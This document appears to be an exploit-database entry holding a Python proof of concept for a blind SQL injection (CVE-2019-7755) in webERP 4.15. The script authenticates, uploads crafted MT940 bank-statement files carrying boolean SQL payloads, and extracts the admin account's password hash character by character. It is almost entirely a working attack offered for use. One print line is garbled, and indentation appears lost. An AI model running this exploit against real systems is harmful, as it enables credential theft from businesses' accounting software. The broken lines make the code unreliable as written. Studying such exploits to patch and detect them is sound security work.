webERP 4.15 - 'ImportBankTransaction' Blind SQL Injection
2019-02-20 19:05:17#!/usr/bin/env python3
"""
#
#
# Exploit Title: webERP v4.15 ImportBankTransaction Blind SQL Injection
# Google Dork: N/A
# Date: 2019-02-20
# Exploit Author: Amine Mehdaoui
# Vendor Homepage: https://www.weberp.com
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: 4.15
# Tested on: Ubuntu 18.04.1
# CVE: CVE-2019-7755
#
#
#
# Description:
# The Import Bank Transaction function fails to sanitize the content of imported MT940
# bank statement files, resulting in the execution of arbitrary SQL queries.
#
#
#
# Attack Vector:
# An authenticated user with access to the Import Bank Transaction function
# (to which access is granted by default to security roles such as 'accountant' and 'AR clerk')
# can leverage a specially crafted MT940 file to trigger a SQL injection flaw.
#
#
#
# Notes:
# 1. PoC was written to retrieve admin account CRYPT-BLOWFISH password hash.
# 2. Successful exploitation requires access to the Import Bank Transaction function.
#
#
#
#
#
"""
from requests import session
from bs4 import BeautifulSoup
import sys, argparse
url = ''
csrftk = ''
def login(user, password):
global csrftk
s = session()
csrftk = BeautifulSoup(s.get(url).text, 'html.parser').find('input', attrs = {'name':'FormID'})['value']
login_data = {
'UserNameEntryField' : user,
'CompanyNameField' : 0,
'SubmitUser' : 'Login',
'Password' : password,
'FormID' : csrftk
}
if 'Main Menu' in BeautifulSoup(s.post(url, login_data).text, 'html.parser').title.string:
return s
return None
def exploit(session):
admin_hash = ''
for i in range(61)[1:]:
for c in [x for x in range(32, 127) if x!=39]:
payload = "123' AND (SELECT CASE WHEN %d=ASCII(substring((SELECT password FROM www_users WHERE userid='admin'), %d, 1)) THEN '1' ELSE '2' END)='1"%(c,i)
mt940_stmt_file = {'ImportFile' : ('mt940.txt', ':20:1\n:25:%s\n:28C:160/2019/PWN\n:60F:1111111USD111111111111,11' %payload)}
data = {
'ImportFormat' : 'MT940-ING',
'Import' : 'Process',
'FormID' : csrftk
}
resp = session.post('%sImportBankTrans.php' %url, data = data, files = mt940_stmt_file)
if not 'WARNING' in resp.text:
break
admin_hash+=chr(c)
print('[+] admin hash : %s' min_hash)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='webERP v4.15 ImportBankTransaction Blind SQL Injection Exploit')
parser.add_argument('url', help='URL of webERP installation directory')
parser.add_argument('user', help='Account username')
parser.add_argument('password', help='Account password')
args = parser.parse_args()
url = args.url.rstrip('/') + '/'
session = login(args.user, args.password)
if not session:
print('[-] Failed to login to webERP')
sys.exit(1)
exploit(session)
Fixes
No fixesIn order to submit a new fix you need to be registered.